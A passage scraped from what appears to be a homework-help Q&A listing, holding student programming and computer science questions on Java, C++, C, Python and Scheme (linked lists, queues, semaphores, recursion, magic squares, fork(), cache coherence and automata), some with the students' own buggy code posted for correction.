number should not be stored). Invoke the average method to find the average of the integers in the array (send the
array as the parameter). Does this work?
5. Add a method minimum that takes a variable number of integer parameters and returns the minimum of the
parameters. Invoke your method on each of the parameter lists used for the average function.
//*******************************************************
// Parameters.java
//
// Illustrates the concept of a variable parameter list.
//*******************************************************
import java.util.Scanner;
public class Parameters
{
//-----------------------------------------------
// Calls the average and minimum methods with
// different numbers of parameters.
//-----------------------------------------------
public static void main(String[] args)
{
double mean1, mean2;
mean1 = average(42, 69, 37);
mean2 = average(35, 43, 93, 23, 40, 21, 75);
System.out.println ("mean1 = " + mean1);
System.out.println ("mean2 = " + mean2);
}
//----------------------------------------------
// Returns the average of its parameters.
//----------------------------------------------
public static double average (int ... list)
{
double result = 0.0;
if (list.length != 0)
{
int sum = 0;
for (int num: list)
sum += num;
result = (double)sum / list.length;
}
return result;
}
} • Show less3 answers
- baixiangguobing askedjust select 5... Show more
• Show less
The program should support two forms of input, for example,
America 55 China
USD 55 CHY
just select 5 countries will be fine.1 answer
- Anonymous askedMy code... Show more
I need to implement two methods to my class UnorderedLinkedList: deleteFront and deleteBack
My code is posted here:
Thank you!! :)• Show less0 answers
- Anonymous askedI need to add a method that will split a linked list into two sublists of (almost) equal size. I hav... Show more
I need to add a method that will split a linked list into two sublists of (almost) equal size. I have some code but it's not working. Please fix it!
My full code is posted here:
Thank you!! :)
public void splitMid(LinkedListClass otherList)
{
otherList = new UnorderedLinkedList();
LinkedListNode current;
LinkedListNode current2;
if (count == 0)
System.out.println("The list is null.");
else
{
int newLength = count / 2;
current2 = first;
if (count % 2 == 0)
for(int i = 0; i<newLength; i++)
{
current2 = current2.link;
}
else
for(int i = 0; i<newLength+1; i++)
{
current2 = current2.link;
}
current = first;
if (count % 2 == 0)
while(current != current2)
{
this.deleteNode(first.info);
this.deleteNode(first.info);
this.insertLast(current.info);
current = current.link;
}
else
{
while(current != current2)
{
this.deleteNode(first.info);
this.insertLast(current.info);
current = current.link;
}
int nC = count / 2 - 1;
for(int i = 0; i <= nC; i++)
{
this.deleteNode(first.info);
}
}
while(current2 != null)• Show less
{
otherList.insertLast(current2.info);
current2 = current2.link;
}
}
}0 answers
- Anonymous askedShow that the problem of testing whether two branching programs compute the same function is solvabl... Show moreShow that the problem of testing whether two branching programs compute the same function is solvable
in polynomial time if and only if P = NP.
• Show less1 answer
- Anonymous askedI need to add a method that will split a linked list at a node whose info is given. #6 in the image,... Show more
I need to add a method that will split a linked list at a node whose info is given. #6 in the image, splitAt.
My code is posted here, please use it!
Thank you!! :)
• Show less1 answer
- Anonymous asked(x',y') is defined by b = R*a, where R is d... Show moreThe plane rotation through angle A from a = (x,y) to b =
(x',y') is defined by b = R*a, where R is defined below for
C = cos(A) and S = sin(A). Consider the approximations
b1 = R1*a, b2 = R2*a, and b3 = R3*a for
[C -S] [1 -A] [1 -S] [1 -S ]
R = [ ], R1 = [ ], R2 = [ ], R3 = [ ]
[S C] [A 1] [S 1] [S C*C]
a. Show that b3 can be computed with only two multiplications
and therefore (along with b1 and b2) has only half the cost
of computing b.
b. The relative errors in the rotated vectors, using the 2-norm
(Euclidean norm), are
||b-bi||
ei = ________ for i = 1,2,3.
||b||
Compute the relative errors as functions of A, and compare
the three approximations for accuracy. Hint: compare the
squared relative errors. • Show less0 answers
- HungryBroccoli9028 asked1. What is the effect of the following statement? If a statement is invalid, explain why it is in... Show morec++
1. What is the effect of the following statement? If a statement is invalid, explain why it is invalid. The classes queueADT, queueADT, and linkedQueueType are as defined in this chapter.
a) queueADT<int> newQueue;
b) queueType<double> sales(-10);
c) queueType<string> names;
d) linkedQueueType<int> numQueue(50);
2. What is the output of the following program segment?
linkedQueueType<int> queue;
queue.addQueue(10);
queue.addQueue(20);
cout << queue.front() << endl;
queue.deleteQueue();
queue.addQueue(2 * queue.back());
queue.addQueue(queue.front());
queue.addQueue(5);
queue.addQueue(queue.back() – 2);
linkedQueueType<int> tempQueue;
tempQueue = queue;
while (!tempQueue.isEmptyQueue())
{
cout << tempQueue.front() << “ “;
tempQueue.deleteQueue();
}
cout << endl;
please show steps • Show less1 answer
- Anonymous askedThis is what I have so far.... Show moreThe assignment can be found at
This is what I have so far. Any help with fixing this code would be much appreciated. Thanks.
import java.util.*;
import java.io.*;
class Person{
public String name;
public LinkedList<Person> friends;
public Person(String n){
name = n;
}
public String getName(){
return name;
}
public LinkedList<Person> getFriends(){
return friends;
}
}
public class MicroFB {
Hashtable<String, Person> People = new Hashtable<String, Person>();
Hashtable<String, Boolean> FriendCheck = new Hashtable<String, Boolean>();
public void detCommand(String c, String n1, String n2){
if (c =="P"){
newPerson(n1);
}
else if (c=="F"){
makeFriends(n1, n2);
}
else if (c=="U"){
unFriend(n1, n2);
}
else if (c=="L"){
getFriends(n1);
}
else if (c=="Q"){
areFriends(n1, n2);
}
//else if (c=="X"){
//System.exit();
//}
}
public void newPerson(String name){
Person P = new Person(name);
People.put(name, P);
}
public void makeFriends(String name1, String name2){
String comb;
Person p1 = People.get(name1);
Person p2 = People.get(name2);
p1.friends.add(p2);
p2.friends.add(p1);
if (name2.compareTo(name1)<0)
{
comb = name2+"*"+name1;
FriendCheck.put(comb, true);
}
else if (name1.compareTo(name2)>0)
{
comb = name1+"*"+name2;
FriendCheck.put(comb, true);
}
}
public void unFriend(String name1, String name2){
String comb;
Person p1 = People.get(name1);
Person p2 = People.get(name2);
p1.friends.remove(p2);
p2.friends.remove(p1);
if (name2.compareTo(name1)<0)
{
comb = name2+"*"+name1;
FriendCheck.remove(comb);
}
else if (name1.compareTo(name2)>0)
{
comb = name1+"*"+name2;
FriendCheck.remove(comb);
}
}
public void getFriends(String name1){
Person P = People.get(name1);
Iterator i = P.friends.iterator();
while (i.hasNext()) {
System.out.print(i.next() + ", ");
}
}
public boolean areFriends(String name1, String name2){
boolean areFds = false;
if (name2.compareTo(name1)<0)
{
String comb = name2+"*"+name1;
areFds = FriendCheck.get(comb);
}
else if (name1.compareTo(name2)>0)
{
String comb = name1+"*"+name2;
areFds = FriendCheck.get(comb);
}
return areFds;
}
public static void main(String[] args)
{
Scanner sc = new Scanner(System.in);
MicroFB MFB = new MicroFB();
String line;
String command;
String name1;
String name2 = "";
while (sc.hasNextLine()){
line = sc.nextLine();
String[] words = line.split(" ");
if (words.length == 3){
command = words[0];
name1 = words[1];
name2 = words[2];
MFB.detCommand(command, name1, name2);
}
else if (words.length == 2){
command = words[0];
name1 = words[1];
MFB.detCommand(command, name1, name2);
}
}
}
}
• Show less1 answer
- Anonymous askedDesign a class IntList that con... Show moreWrite a C++ program program.cpp along with IntList.h and IntList.cpp.
Design a class IntList that contains a linked list of integers. The class should have member functions as follows:
– IntList(): Creates an empty list
– appendNode(int num): Adds a number to the end of the list
– deleteNode(int num): Delete a number from the list
– displayList(): Display the current contents of the list
– ~IntList(): Destroys the list
– selectionSort(): Performs selection sort on the list (in ascending order). Note that this sort operation must be performed directly on the linked list, not some separate copy of array.That is, you must use node pointers instead of array index to implement the algorithm.
In the main function do the following:
– Create an empty IntList object.
– Call appendNode function several times to put some numbers in random order.
– Then display the list (it should show unsorted numbers).
– Now perform selection sort on the list.
– Then display the list again (it should show sorted numbers). • Show less2 answers
- Anonymous asked, A[n... Show moreI rate all answers given....Thanks in advance. (two questions)
Question #1
Let A = {A[1], A[2], …, A[n]} represent n integers. An algorithm Foo1 is given
Foo1 (A)
1. sum = 0;
2. for i=1 to n
3. if A[i] % 2 == 0
4. sum = sum + A[i];
5. return sum;
Briefly describe the functionality of this algorithm.
What could be the best case of the algorithm?
What is the best case running time of the algorithm?
What could be the worst case of the algorithm?
What is the worst case running time of the algorithm?
Question #2
A = {A[1], A[2], …, A[n]} represent n integers. An algorithm Fo2 is given
Foo2 (A)
1. temp = A[1];
2. for i = 2 to n
3. if A[i] < temp
4. temp = A[i];
5. return temp;
Briefly describe the functionality of this algorithm.
What could be the best case of the algorithm?
What is the best case running time of the algorithm?
What could be the worst case of the algorithm?
What is the worst case running time of the algorithm?
• Show less0 answers
- Anonymous askedexpression R, that R is equival... Show more
Show by induction on the number of operator occurrences in a regular expression R, that R is equivalent to either the regular expression Ø, or some Ø-free regular expression.• Show less1 answer
- Anonymous askedthis is my first year of C++ and i am having alot of trouble figuring out this program involving fun... Show morethis is my first year of C++ and i am having alot of trouble figuring out this program involving functions. the program gives a menu for the options the users has and the user must choose their choice. i must do this with the functions given. i cannot figure this out and would appreciate it if someone could help me get on the right track. here is the program:
this is the menu and functions
'A' Find if the sum of the two integers eneterd is even or odd
'B' Finds if the number entered is prime
'C' Finds the sum between two integers
'D' Asks for a year and tells if it is a leap year
'E' Displays the menu
'Q' Quits the program
functions:
void printMenu()
bool isEven (int,int)
bool isPrime (int)
bool sum(int)
bool leapYear(int)
thanks for your help • Show less1 answer
- Anonymous askedChris Johanson wants a program that calculates... Show moreThis is all I could get. Thanks
Problem specification
Chris Johanson wants a program that calculates and displays a 10%,
15%, and 20% tip on his total restaurant bill. First, create an IPO chart
for this problem, and then desk-check the algorithm twice, using
$35.80 and $56.78 as the total bill. After desk-checking the algorithm,
list the input, processing, and output items in a chart.
IPO chart information C++ instruction
Input
Total bill double totalBill = 0.0;
Tip 10 percent double tipOne = 0.0;
Tip 15 percent double tipTwo = 0.0;
Tip 20 percent doubletipThree = 0.0;
Processing
Total bill from restaurant double total Bill = 0.0;
Output
Tip double tip = 0.0;
Algorithm
1.enter the total bill and tip percent
2.calculate the total with tip one
3.calculate the total with tip two
4.calculate the total with three
5.calculate the tip by multiplying the
Total bill with the tip percentage
6.display the tip of each one. • Show less0 answers
- Anonymous askedwrite a program that simulates a bank. The program will prompt the user asking if they want to run t... Show morewrite a program that simulates a bank. The program will prompt the user asking if they want to run the program again. If yes, then start the program over. If no, then terminate the program.
The execution phase run for 2 minutes during which time customers will arrive randomly between 2 - 6 seconds and be placed into a queue. Each customer will have a property relating to the amount of time he/she wants to spend with a teller, which is to be randomly generated to be between 2 and 5 seconds.
There would be a maximum of 5 tellers to attend to the customers. When you start the simulation, each teller is occupied.You will need to generate a random time for each of the first 5 customers occupying the tellers at the begining of the 2 minutes simulation.
As they finish attending a customer (based upon the amount of time associated with each customer), that teller becomes available for the next customer in the queue. As a customer is removed from the queue and sent to an "available" teller, then their availability is set to "False". Customers are allocated to any one of the 5 tellers that becomes available, and so on... until the time of 2 minutes for the simulation is finished.
If after 2 minutes, there are still customers in the queue, we would discard them, but still count them in the total count of customers that visited the bank. Also add into the total count of customer the first five customers that the tellers started out with as well as to the individual teller's total.
Finally display on the screen (at the end of each execution):
The total amount of customers that visited the bank for that 2 minutes.
The total amount of customers that each teller helped.
The total amount of time that each teller was occupied.
The total amount of customers that did not get to see a teller. • Show less1 answer
- AmusingMorning5095 askedWrite a program to compute miles per gallon for an automobile. Use a function to determine mpg. Pass... Show more
Write a program to compute miles per gallon for an automobile. Use a function to determine mpg. Pass data by value to the function.
Print results in main program .
Implementation:
Prompt user for previous odometer reading, new odometer reading, and gallons added to tank to fill.
( PLEASE I NEED IT IN C++ NOT IN C )• Show less1 answer
- Anonymous asked0 answers
- DiligentDragon7282 asked#include<stdio.h>
#include<stdlib.h>
#define ITERS 8
struct sf { struct sf * bp ;
void * ra ;
int p1 ;... Show more#include<stdio.h>
#include<stdlib.h>
#define ITERS 8
struct sf { struct sf * bp ;
void * ra ;
int p1 ;
int p2 ;
int p3 ;
} ;
int f(int i, int i2, int i3 ) {
struct sf * sf ;
if (i>0) f(i-1, i2+1, 0xdeadbeef ) ;
else {
int j = i2 ;
sf = &i-2 ; // what assumption am i making?
while ( j>0 ) {
printf("\naddr=%p\n bp=%p\n ra=%p\n params:\n p1=%d\n p2=%d\n p3=%#x\n",
sf, sf->bp, sf->ra, sf->p1, sf->p2, sf->p3 ) ;
sf = sf->bp ;
j-- ;
}
}
return 0 ;
}
int main(int argc, char * argv[]) {
f(ITERS, 0, 0xdeadbeef ) ;
return 0 ;
}
--------------------------
// What does this program print?
// Why does it print this?
// How does it accomplish it?
// What do the variable names "sf", "bp" and "ra" stand for?
• Show less0 answers
- MachoVacation6896 askedValidate input using a do while loop. Users cant enter negative numbers. echo screen and output a f... More »1 answer
- Anonymous askedHi! I've tried everything, but no success. I really need this withing 30-40 minutes. Here's the code... Show moreHi! I've tried everything, but no success. I really need this withing 30-40 minutes. Here's the code to finding the mode:
for(int a=0; a < pack.length; a++)
{
tempcounter = 0;
for(int k=0; k < pack.length; k++)
{
if(pack[a] == pack[k])
{
tempcounter++;
if(counter<tempcounter)
{
counter = tempcounter;
numoccured = pack[a];
}
}
}
}
***Just so you know, numoccured is the mode. • Show less1 answer
- Anonymous asked1 answer
- sosodef askedhow can i draw a histogram of 2-11 and each bar of the number would reach up to the chain length of... Show morehow can i draw a histogram of 2-11 and each bar of the number would reach up to the chain length of that number in a hailstone sequence.
• Show less1 answer
- SilkyBank6955 asked1 answer
- SilkyBank6955 asked1 answer
- Anonymous asked1 answer
- Anonymous askedConsider a 4-drive, 200 GB-per-drive RAID array. What is the available data storage capacity for eac... More »0 answers
- crimson25 askedThe program I have written, show... Show more
This is about how to use semaphores to synchronize multiple threads.• Show less
The program I have written, shown below, creates three threads: PrintA will be responsible for printing out A's, PrintB for B's, and PrintC for C's. I need you to add semaphores such that the program will repeatedly print out three A's followed two B's, then a C. The following printout is a correct example: AAABBCAAABBCAAABBCAAABBC……. You can only add semaphore-related statements. You cannot add the others such as regular variables, control structures or user defined functions.
// project4.cpp : main project file.
#include "stdafx.h"
using namespace System;
using namespace System::Threading;
ref class PrintTasks
{
public: static bool runFlag = true;
public:
void PrintA(Object^ name) {
while (runFlag) {
Console::Write("{0}\n", "A");
}
}
void PrintB(Object^ name) {
while (runFlag) {
Console::Write("{0}\n", "B");
}
}
void PrintC(Object^ name) {
while (runFlag) {
Console::Write("{0}\n", "C");
}
}
};
int main(array ^args)
{
PrintTasks ^tasks = gcnew PrintTasks();
// First Method
Thread ^thread1 = gcnew Thread ( gcnew ParameterizedThreadStart( tasks, &PrintTasks::PrintA ) );
Thread ^thread2 = gcnew Thread ( gcnew ParameterizedThreadStart( tasks, &PrintTasks::PrintB ) );
Thread ^thread3 = gcnew Thread ( gcnew ParameterizedThreadStart( tasks, &PrintTasks::PrintC ) );
thread1->Start("printA");
thread2->Start("printB");
thread3->Start("printC");
Thread::Sleep(50);
PrintTasks::runFlag=false;
thread3->Abort();
thread2->Abort();
thread1->Abort();
return 0;
}0 answers
- Anonymous askedThe find the average diagonally there shou... Show moreTo find:
The average of each column and row. (up and Down)
The find the average diagonally there should be 2 (across)
Please show the output by picture or by pasting here.
Thank you • Show less1 answer
- GroovyHorse7071 askedImplement a magic square. A magic square is a square of numbers with N rows and N columns, in which... Show more
Implement a magic square. A magic square is a square of numbers with N rows and N columns, in which each integer value from 1 to (N x N) appears exactly once, and the sum of each column, each row and each diagonal is the same value. For example, the figure below shows the magic square when N = 3.
You will create a square for an input value of N using the following algorithm:
- Insert the value 1 in the middle of the first row
- While the counter is less than or equal to N^2
- Place the next number (x + 1) in the position one row up and one row to the right, unless:
i.You move off the top in any column: If so, move to the bottom row
ii.You move off the right end: If so, move to the first column
iii.You move to a position already filled or out of the upper right corner: If so, move one row below where x was inserted
- Stop when you have placed as many elements as there are in the array
** SEE BELOW **
Start with the main function I have provided and add functionality to show each iteration after each new item is inserted.
Create two functions:
- populateArray: This function populates the array based on the algorithm above. After every new addition, call the printArray function
- printArray: This function takes in the current array (the numbers filled in so far and prints it out). If the number hasn’t been filled in yet, it should print an “X”
What you will turn in:
- Change the SIZE to be 3 and 9
- Show output using both sizes
****** ..................... **************** (PLEASE COMMENT YOUR CODE)
#include <iostream>• Show less
#include <math.h>
#define SIZE 3
using namespace std;
bool checkArray(int inputArray[][SIZE], int numRows, int numCols)
{
// Each row, column and diagonal should be equal to
// (1/SIZE) * Sum(1 through SIZE^2)
int correctAnswer = (int)((pow(SIZE, 4.0) + pow(SIZE, 2.0))/(2 * (SIZE)));
cout << "Looking for: " << correctAnswer << "\n";
for (int i = 0; i < numRows; i++)
{
int sumV = 0;
int sumH = 0;
// Scan row and column simultaneously
for (int j = 0; j < numCols; j++)
{
sumV = sumV + inputArray[j][i];
sumH = sumH + inputArray[i][j];
}
// Print out results for row and column
cout << "Sum for column " << i << ": " << sumV << "\n";
cout << "Sum for row " << i << ": " << sumH << "\n";
if (sumV != correctAnswer || sumH != correctAnswer)
return false;
}
int sumD1 = 0;
int sumD2 = 0;
for (int i = 0; i < numRows; i++)
{
sumD1 = sumD1 + inputArray[i][i];
sumD2 = sumD2 + inputArray[i][SIZE - i - 1];
}
cout << "Sum for diagonal 1: " << sumD1 << "\n";
cout << "Sum for diagonal 2: " << sumD2 << "\n";
if (sumD1 != correctAnswer || sumD2 != correctAnswer)
return false;
return true;
}
/////////////////////////////////////////
// Main function: Creates a magic
// square
//////////////////////////////////////
int main()
{
int counter = 0;
// Set the array to 0
int originalArray[SIZE][SIZE] = {0};
for (int i = 0; i < SIZE; i++)
{
for (int j = 0; j < SIZE; j++)
originalArray[i][j] = 0;
}
// Populate and print array
populateArray(originalArray, SIZE, SIZE);
// Checking to see if array is correct
if (checkArray(originalArray, SIZE, SIZE))
cout << "This is a magic square\n";
else
cout << "This is not a magic square\n";
return 0;
}0 answers
- Fusion askeda) Write a recursive Java method that will accept a positive integer as an argument, returning the p... Show morea) Write a recursive Java method that will accept a positive integer as an argument, returning the product of the digits in that integer.
b) Write a recursive Java method that will accept two positive integers as arguments, returning the product of those two integers.
c) Write a recursive Java method that will accept a string as an argument, returning whether that string is a palindrome. Recall, a palindrome is a sting of characters that reads the same forwards or backwards (i.e. abba, 12321).
• Show less1 answer
- DashingTriangle9176 askedwrite a program to read in 5 integers and store them in an array. Find and display the minimum value... More »1 answer
- Anonymous askedLet's define a zipper as a proper list where each element is a list with exactly two elements which... Show moreLet's define a zipper as a proper list where each element is a list with exactly two elements which can be any expressions. Write a function zipper? that returns #t if its single argument is a zipper and #f if it is not. Write a function zip that takes two proper lists and creates a zipper out of them, pairing up elements from the first and second arguments. If the either of the two lists is shorter than the other, use null for the missing elements. Write a function unzip that reverses the process, taking a zipper and returning a list of two lists. Some examples should make this clear.
> (zipper? '((a 1)(b 2)))
#t
> (zipper? '((foo 100)(bar 2 3)))
#f
> (zipper? '((a 1) b (c 3)))
#f
> (zipper? '((a 1) . 2))
#f
> (zip '(a b c) '(1 2 3))
((a 1) (b 2) (c 3))
> (zip '(a b c) '(1))
((a 1) (b ()) (c ()))
> (zip '(a b) '(1 2 3))
((a 1) (b 2) (() 3))
> (zip '() '())
()
> (unzip '((a 1)(b 2)(c 3)))
((a b c) (1 2 3))
> (unzip '())
(() () • Show less0 answers
- TeamHeat123 askedWrite a class called Temperature that represents temperatures in degrees in both Celsius and Fahrenh... Show moreWrite a class called Temperature that represents temperatures in degrees in both Celsius and Fahrenheit. Use a floating-point number for the temperature and an enum for the scale with either ‘C’ for Celsius or ‘F’ for Fahrenheit.
It will have four constructors: one for the number of degrees, one for the scale, one for both the degrees and the scale, and a default constructor. For each of these constructors, assume zero degrees if no value is specified and Celsius if no scale is given.
It will have two accessor methods: one to return the temperature in degrees Celsius, the other to return it in degrees Fahrenheit. (Use the formulas from the Programming Project 5 of Chapter 3 and round to the nearest tenth of a degree.)
It will have three mutator methods: one to set the number of degrees, one to set the scale, and one to set both.
It will have three comparison (boolean) methods: one to test whether two temperature objects are equal, one to test whether one temperature is greater than another, and one to test whether one temperature is less than another.
Write a separate driver program called TemperatureDriver that tests all of the above methods. Be sure to invoke each of the constructors, to include at least one true and one false case for each of the different comparison methods, and to test at least the following three temperature pairs for equality: 0.0 degrees C and 32.0 degrees F, -40.0 degrees C and -40.0 degrees F, and 100.0 degrees C and 212.0 degrees F.
I need all of this done in the exact way it is asked to get full credit. Thank You!!!
• Show less1 answer
- Anonymous asked0 answers
- Anonymous asked“Commonly it considered that degree of multiprogramming is affecting CPU utilization and always in... More »1 answer
- Anonymous asked1.... Show moreWrite a program in C language and run it in Linux environment that displays the following results:
1. Display the Process ID of the Parent processes
2. Then execute a fork() call
3. If call is successful on fork( ) execution then display the process identifier of the Child process which returned to the Parent process Or Display the Process ID of Child process
4. Show that Process ID of the Parent process does not change before and after fork() call.
5. Child process display a message “I AM CHILD PROCESS”
6. Parent process display a message “I AM PARENT PROCESS”
• Show less0 answers
- Anonymous askedWrite a menu-driven mini-statistics package. A user should be able to enter up to 200 items of float... Show moreWrite <EOF> <EOF> when you are done with data input.
Item #1 : 25
Item #2 : 36
Item #3 : 27.5
Item #4 : 28
Item #5 : 32
Item #6 : 33.25
Item #7 : <EOF>
This program will perform the following:
1) Enter data.
2) Display the data and the following statistics:
the number of date item, the high and low values in the data, the mean, median, mode, variance and standard deviation.
3) Quit the Program
• Show less2 answers
- Anonymous asked0 answers
- Anonymous asked0 answers
- Anonymous askedWrite a main method based on method call given that prints six numbers from array list1 in... Show moreProblem:
Write a main method based on method call given that prints six numbers from array list1 in reverse.
The array list is: 1 2 3 4 5 6 The reverse array list is: 6 5 4 3 2 1
Use the following in the program:
public static int[] reverse(int[] list) {
int[] result = new int[list.length];
for (int i = 0, j = result.length - 1;
i < list.length; i++, j--) {
result[j] = list[i];
}
return result;
}
int[] list1 = new int[]{1, 2, 3, 4, 5, 6};
int[] list2 = reverse(list1);
• Show less1 answer
- Anonymous asked... Show more
// Correct the errors in this program• Show less
// Find the total result of 10 numbers
public class SumArray_2
{
public static void main(String args[])
{
int[] arrayName;
arrayName = new int [10];
// add each element's value to total
for (int counter = 0; counter total += arrayName[ counter ];
System.out.printf("Total of arrayName elements: %d\n");
} // end main
} // end of class InitArray21 answer
- Anonymous askedDesign the logic for a program that allows a user to enter 10 numbers, then displays them in the rev... Show moreDesign the logic for a program that allows a user to enter 10 numbers, then displays them in the reverse order of their entry.
(write a python code for this program and run the code to make sure it works) • Show less1 answer
- Anonymous askedThe Midville Park District maintains fivr soccer teams, as shown in the table. Design a program that... Show moreThe Midville Park District maintains fivr soccer teams, as shown in the table. Design a program that accepts a player's team number and displays the player's team name.
_____________________________
Team number Team name
______________________________
1 Goal Getters
2 The Force
3 Top Guns
4 Shooting Stars
5 Midfield Monsters
(write a python code and runs it) • Show less1 answer
- Anonymous asked1st line: nu... Show moreWrite a C++ program to solve the following problem
Given: a set of data
File name: data
1st line: number of additional lines of data
Additional lines: 5 measurement on each line:
length, width, height, fraction, weight
Each line contain data for 1 item produced on an assembly line.
The 3 size measurement can be used to determine the size of a box (box volume) that will hold each item.
The "fraction" value is the percent of the "box volume" that is the actual volume of the item
compute and print
The item with the largest box volume? • Show less0 answers
- Anonymous asked... Show moreA 4-core system with central memory with MOSI (Modi?ed, Owned, Shared, Invalid) ?ags and write-back
policy, has cache that contains 4 blocks each and each block is 4 decimal digits. The four caches look like
the following:
Cache P0
Block Flag Tag Data
B00 I 104 1234
B01 O 108 5678
B02 S 112 2468
B03 S 120 1357
Cache P1
Block Flag Tag Data
B00 M 100 1235
B01 O 116 5679
B02 I 112 4321
B03 S 120 1357
Cache P2
Block Flag Tag Data
B00 I 100 1234
B01 O 104 5678
B02 I 116 2468
B03 S 122 8765
Cache P3
Block Flag Tag Data
B00 S 104 5678
B01 S 108 5678
B02 S 112 2468
B03 S 122 8765
(1) Assume snooping protocol. Show the contents of the memory for the blocks addressed as 100, 104,
..., 122, 124. If the contents cannot be dertermined by the above cache images, assume they are
equal to the last four bits of your student number.
(2) Assume directory protocol. Show the contents of the directory for this memory.
1(3) How does the memory look after P0 executes an atomic increment on the leftmost (decimal) byte of
122. The ?rst invalid entry is the victim.
(4) How does the directory look like after this operation? • Show less0 answers
- Anonymous askedC.
Modify the movie-rating program so that the user is prompted continuously for a movie title until... Show moreC.
Modify the movie-rating program so that the user is prompted continuously for a movie title until ZZZZZ is entered. Then, for each movie,continuously accept star-rating values until a negative number is entered. Display the average rating for each movie. • Show less0 answers
- flowers89 askedexpens... Show more
Using Functions and Arrays
Write a C++ program that calculates and displays the total travel
expenses of a business trip. The user must provide the following information:
• Number of days spent on the trip.
• The departure on the first day of the trip, and the time of arrival back home on the
last day of the trip. The departure and arrival time must be entered in 12h or 24h
formats. Your program should consider AM and PM.
• Amount of airfare, if any
• Amount of car rentals, if any
• Miles driven, if a private vehicle was used
• Parking Fees, if a rental or private vehicle was used
• Amount of taxi charges, if any
• Conferences or seminars registration fees, if any
• Lodging charges per night
• The amount of meals eaten
The company reimburses travel expenses according to the following policy:
• Up to $37.00 per day for meals. The company allows up to $ 9 for breakfast, $ 12
for lunch, and $ 16 for dinner per day. On the first day of the trip, breakfast is
allowed as an expense if the time of departure is before 7 AM. Lunch is allowed if
the time of departure is before 12 noon. Dinner is allowed on the first day if the
time of departure is before 6 PM. On the last day of the trip, breakfast is allowed
if the time of arrival is after 8 AM. Lunch is allowed if the time of arrival is after
1 PM. Dinner is allowed on the last day if the time of arrival is after 7 PM.
Anything in excess of this must be paid by the employee. It is not necessary
reimburse to the company any savings on meals. It can be subtracted to the
amount that must be reimbursing to the company. The following Table
summarized this point.
- Parking fees, up to $10.00 per day
- Taxi charges up to $20.00 per day
- Rent a car fees, up to $45.00 per day
- Lodging charges up to $95.00 per day
- If a private vehicle is used, $0.27 per mile driven
- Conference or seminars fees up to $2,500
- Amount of airfare
The program should calculate and display the following:
- Total expenses incurred by the business person
- The total allowable expenses for the trip
- The excess for that must be paid by the business person, if any
- The amount saved by the business person if the expenses were under the total allowed.
The program should have the following functions:
CalcMeals ( ) Calculate and returns the amount reimbursed for meals.
CalcMileage ( ) Calculate and returns the amount reimbursed for mileage driven in
a private vehicle.
CalcParkingFees ( ) Calculate and returns the amount reimbursed for parking fees.
CalcTaxiFees ( ) Calculate and returns the amount reimbursed for taxi charges.
CalcLodging ( ) Calculate and returns the amount reimbursed for lodging.
CalcTotalReimbursement ( ) Calculate and returns the total amount reimbursed.
CalcUnallowed ( ) Calculate and returns the total amount of expenses that are not
allowable, if any.
CalcSaved ( ) Calculate and returns the total amount of expenses under the
allowable amount, if any. For example, the allowable amount for
lodging is $95.00 per night. If a business person stayed in a hotel
for $85.00 per day for 3 nights, the savings would be $ 30.00.
IVPos ( ) Do not accept negative numbers for any dollar amount or for miles
driven in a private vehicle. This function returns a value greater or
equal than zero.
IVDays ( ) Do not accept numbers less than 1 for the number of days.• Show less2 answers
- Anonymous askedve been hired by the Fly-By-Night-Engineering-Company, Your new supervisor asks... Show moreCongratulations! You’ve been hired by the Fly-By-Night-Engineering-Company, Your new supervisor asks you to write a C++ program that will manage a list of domain names and IP numbers stored in an array of structs. This program will give you practice inputting data from files, writing and calling functions, using arrays and outputting data to a file. You should only use one array of structs.
The infotype in this problem will consist of an Internet domain name (string), an IP number (string) and a counter (int). New entries are added to the end of the array. Whenever an item is accessed by the F(ind) or M(odify) command, its counter is incremented by one.
Prompt the user to input the name of the data file. (3 pts) The input contains lines of the following format:
<command> < data for processing the command>
commands are: A, M, D, F, P, Q
//----------------------------------------------------------------------------------------------------------------
A (insert) will be followed by a domain name and IP number
A: (10 pts) Add an entry with the domain name, IP number, and zero counter to the end of the array
//----------------------------------------------------------------------------------------------------------------
M (modify) will be followed by a domain name and a new IP number
M: ( 10 pts) Changes the IP number for the indicated domain name. Increment the counter.
//----------------------------------------------------------------------------------------------------------------
D (delete ) will be followed by the name to delete from the array
D: (8 pts) deletes the entry with the indicated domain name from the array
//----------------------------------------------------------------------------------------------------------------
F (find) will be followed by a domain name to find in the list
F: (8 pts) print out the IP number for the indicated domain name. Increment the counter.
//----------------------------------------------------------------------------------------------------------------
P (print) will have no additional data
P: (5 pts) Print the contents of the array; print domain name, IP number, counter for each entry
//----------------------------------------------------------------------------------------------------------------
Q (quit) will have no additional data.
Q: (16 pts) stop processing; do the following:
Use Selection sort to sort the array in order by domain name.
Print the sorted list to the screen.
Prompt the user to input a top level domain ( for example edu ) Print a list of all list entries from that domain to the screen. (Allow multiple entries)
Print the list entry with the largest counter to the screen. (this was the most popular web site)
Print the sorted list to an output file. Make sure to include your name and lab CRN in the output file.
Name the output file with your first and last name
Notes:
1. Remember to review the grading algorithm.
2. Save a copy of the file you hand in. Make sure to leave the file unchanged after your submission until you receive a grade on the project assignment.
3. Sample data one.txt, two.txt, and three.txt ,try.txt
4. Print a message if the domain name being searched for is not in the array.(modify, change, delete)
5. Do not use global variables; pass parameters.
6. You should use functions to accomplish each task. You must have at least five functions.
7. Make sure that your output has a heading and is labeled.
8.Use function prototypes; function definitions should be after the main.
9. Name your source code file using your last name and first initial as follows: lastname_firstInitial_Prj4.cpp
For example Stewie Griffin would save his source code in a file name Griffin_S_Prj4.cpp
10. Echo print the data input from each line.
11. This program will have many lines of output. You should count the lines of output and use an if similar to the following to allow the user to see all of the output.
if ( lines % 20 == 0)
{
cout << "enter a character to continue ";
cin >> it;
}
12.A small sample input file follows on the next page. A sample output follows on the last page. NOTICE that the sample output is not compete; it does not perform the tasks required when the Q command is encountered.
• Show less0 answers
- Anonymous askedAnalyze and Draw a “Cross Reference Matrix” to identify/show different reports and attributes, ... More »0 answers
- Anonymous askedGive the hexadecimal memory representation for real number127.9375 that is stored in a single precis... Show moreGive the hexadecimal memory representation for real number127.9375 that is stored in a single precision 32 bit floating point variable. Show your work for each step.
i. Integer & Decimal/Fractional Portion Conversions
ii. Normalized Binary Representation for the Integer & Decimal
Portions Together
iii. Conversion from above to Sign, Exponent, Mantissa portions
(1bit, 8 bit, 23 bits respectively)
iv. Conversion from Binary to Hex • Show less1 answer
- Anonymous askedI read some wh... Show more
I am having problem with finding a state diagram for PDA that accept {ww: w ε {a,b}*}
I read some where that I need two stack PDA or something. A JFLAP diagram would be a great help.
Thank• Show less0 answers
